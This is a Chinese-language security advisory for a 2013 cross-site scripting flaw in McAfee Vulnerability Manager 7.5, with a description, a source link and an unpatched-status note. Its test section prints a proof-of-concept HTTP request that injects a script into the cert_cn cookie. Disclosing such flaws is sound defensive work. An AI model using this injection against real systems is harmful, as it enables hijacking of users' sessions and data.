McAfee Vulnerability Manager 'cert_cn'参数跨站脚本漏洞
McAfee Vulnerability Manager 'cert_cn'参数跨站脚本漏洞
发布日期:2013-03-08
更新日期:2013-03-11
受影响系统:
McAfee Vulnerability Manager 7.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58401
McAfee Vulnerability Manager可集实时资产检测、基于风险的扫描和卓越性能为一体,能够提供持续的资产监控。
McAfee Vulnerability Manager 7.5及其他版本在实现上存在XSS漏洞,成功利用后可允许攻击者破坏应用、访问或修改数据、利用其他漏洞。
<*来源:Asheesh Anaconda
链接:http://packetstormsecurity.com/files/120721/mcafee75-xss.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
GET /www.example.com/index.exp HTTP/1.1
Cookie: identity=p805oa53c0dab5vpcv1da30me7;
cert_cn=%27%22%28%29%26%251%3CScRiPt %3Eprompt%28920847%29%3C%2FScRiPt%3E;
remember=remember
Host: 172.28.1.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
建议:
--------------------------------------------------------------------------------
厂商补丁:
McAfee
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.mcafee.com/cn/products/vulnerability-manager.aspx
评论暂时关闭